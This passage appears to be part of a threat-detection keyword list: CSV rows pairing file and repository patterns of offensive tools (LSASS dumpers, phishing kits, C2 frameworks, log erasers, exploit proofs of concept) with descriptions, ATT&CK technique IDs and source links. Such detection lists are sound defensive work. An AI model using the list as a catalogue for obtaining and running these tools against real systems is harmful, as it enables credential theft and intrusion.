If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.,T1003.001 - T1055 - T1093,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access - Defense Evasion,https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin,1,1,N/A,9,1,39,3,2023-09-11T14:03:21Z,2022-09-13T12:42:13Z -*/EvilnoVNC.git*,offensive_tool_keyword,EvilnoVNC,EvilnoVNC is a Ready to go Phishing Platform,T1566 - T1566.001 - T1071 - T1071.001,TA0043 - TA0001,N/A,N/A,Phishing,https://github.com/JoelGMSec/EvilnoVNC,1,1,N/A,9,7,662,118,2023-09-25T10:50:52Z,2022-09-04T10:48:49Z -*/evilqr.git*,offensive_tool_keyword,evilqr,Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice,T1566.002 - T1204.001 - T1192,TA0001 - TA0005,N/A,N/A,Phishing,https://github.com/kgretzky/evilqr,1,1,N/A,N/A,2,152,21,2023-07-05T13:24:44Z,2023-06-20T12:58:09Z -*/evilSignatures.db*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -*/EvilTwinServer*,offensive_tool_keyword,EvilLsassTwin,attempt to duplicate open handles to LSASS. 
If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.,T1003.001 - T1055 - T1093,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access - Defense Evasion,https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin,1,1,N/A,9,1,39,3,2023-09-11T14:03:21Z,2022-09-13T12:42:13Z -*/EvtMute.git*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*/Example_C2_Profile*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*/Example_Payload_Type/*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*/ExcelDocWriter.cs*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*/exchanger.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/exe_to_dll.git*,offensive_tool_keyword,exe_to_dll,Converts a EXE into DLL,T1027.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hasherezade/exe_to_dll,1,1,N/A,5,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*/exe_to_dll.git*,offensive_tool_keyword,exe_to_dll,Converts an EXE so that it can be loaded like a DLL.,T1055.002 - T1073.001 - T1027,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/hasherezade/exe_to_dll,1,1,N/A,8,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*/exe2powershell*,offensive_tool_keyword,exe2powershell,exe2powershell is used to convert any binary file to a bat/powershell file,T1059.001 - T1027.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/yanncam/exe2powershell,1,1,N/A,6,2,153,44,2020-10-15T08:22:30Z,2016-03-02T11:23:32Z -*/exec_bin.c*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 
- T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/exec_dll.c*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/exec_psexec*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/exec_psh.c*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/exec_wmi*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/exec0.py*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/Executable_Files.git*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*/exegol.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/exegol_user_sources.list*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z 
-*/exegol-docker-build/*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/Exegol-history/*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/Exegol-images-*.zip*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/Exegol-images.git*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/ExeStager/*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/exfiltrate.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers 
or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,0,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*/expl/expl.go*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1533,TA0003,N/A,N/A,Exploitation tools,https://github.com/gbonacini/CVE-2016-5195,1,1,N/A,N/A,3,289,122,2017-03-21T16:46:38Z,2016-10-23T00:16:33Z -*/exploit.cron.sh*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/exploit.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/exploit.ldpreload.sh*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/exploit.pbj*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/exploit/linux/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/exploit/remote/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/exploit/windows/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/exploit_orw.py*,offensive_tool_keyword,Exrop,Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints,T1554,TA0003,N/A,N/A,Exploitation tools,https://github.com/d4em0n/exrop,1,1,N/A,N/A,3,265,26,2020-02-21T08:01:06Z,2020-01-19T05:09:00Z -*/exploits/*.go*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,1,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*/exports_function_hid.txt*,offensive_tool_keyword,cobaltstrike,New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/ServiceMove-BOF,1,1,N/A,10,10,223,45,2022-02-23T07:17:38Z,2021-08-16T07:16:31Z -*/ExternalC2/*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*/ExternalC2/*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/ExtractBitlockerKeys.git*,offensive_tool_keyword,ExtractBitlockerKeys,A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.,T1003.002 - T1039 - T1087.002,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/p0dalirius/ExtractBitlockerKeys,1,1,N/A,10,2,170,22,2023-10-01T21:17:31Z,2023-09-19T07:28:11Z -*/f5_bigip_tmui_rce.rb*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/jas502n/CVE-2020-5902,1,0,N/A,N/A,4,377,112,2021-10-13T07:53:46Z,2020-07-05T16:38:32Z -*/Fa1c0n35/zabbix-cve-2022-23131*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/trganda/CVE-2022-23131,1,1,N/A,N/A,1,1,1,2022-02-24T11:50:28Z,2022-02-24T08:10:46Z -*/fake.html,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z 
-*/FakeCmdLine*,offensive_tool_keyword,FakeCmdLine,Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.,T1059 - T1036,TA0003,N/A,N/A,Defense Evasion,https://github.com/gtworek/PSBits/tree/master/FakeCmdLine,1,1,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*/fakelogonscreen*,offensive_tool_keyword,fakelogonscreen,FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk,T1110 - T1141 - T1078 - T1552,TA0001 - TA0002 - TA0003 - TA0004,N/A,N/A,Credential Access,https://github.com/bitsadmin/fakelogonscreen,1,1,N/A,N/A,10,1225,230,2020-02-03T23:28:01Z,2020-02-01T18:51:35Z -*/fake-sms.git*,offensive_tool_keyword,fake-sms,A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.,T1598.003 - T1514,TA0003 - TA0009,N/A,N/A,Defense Evasion,https://github.com/Narasimha1997/fake-sms,1,1,N/A,8,10,2513,167,2023-08-01T15:34:41Z,2021-02-18T15:18:50Z -*/Farmer.git*,offensive_tool_keyword,Farmer,Farmer is a project for collecting NetNTLM hashes in a Windows domain. 
Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.,T1557.001 - T1056.004 - T1078.003,TA0006 - TA0004 - TA0001,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/mdsecactivebreach/Farmer,1,1,N/A,10,4,308,49,2021-04-28T15:27:24Z,2021-02-22T14:32:29Z -*/fastfuz-chrome-ext*,offensive_tool_keyword,fastfuzz,Fast fuzzing websites with chrome extension,T1110,TA0006,N/A,N/A,Web Attacks,https://github.com/tismayil/fastfuz-chrome-ext,1,1,N/A,N/A,1,23,3,2022-02-04T02:15:51Z,2022-02-04T00:22:51Z -*/fb_firstlast.7z*,offensive_tool_keyword,wordlists,Various wordlists FR & EN - Cracking French passwords,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/clem9669/wordlists,1,1,N/A,N/A,2,191,44,2023-10-03T14:28:50Z,2020-10-21T14:37:53Z -*/fb-brute.pl*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*/fcrdns.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/febinrev/dirtypipez-exploit*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1533,TA0003,N/A,N/A,Exploitation tools,https://github.com/febinrev/dirtypipez-exploit,1,1,N/A,N/A,1,41,21,2022-03-08T11:52:22Z,2022-03-08T11:49:40Z -*/fern-wifi-cracker/*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ffuf.git*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*/ffuf/ffufrc*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*/fiesta.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/fiesta2.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/FilelessPELoader*,offensive_tool_keyword,FilelessPELoader,Loading Remote AES Encrypted PE in memory - Decrypted it and run it,T1027.001 - T1059.001 - T1071,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/FilelessPELoader,1,1,N/A,10,8,727,148,2023-08-29T21:46:11Z,2023-02-08T16:59:33Z -*/final_shellcode_size.txt*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
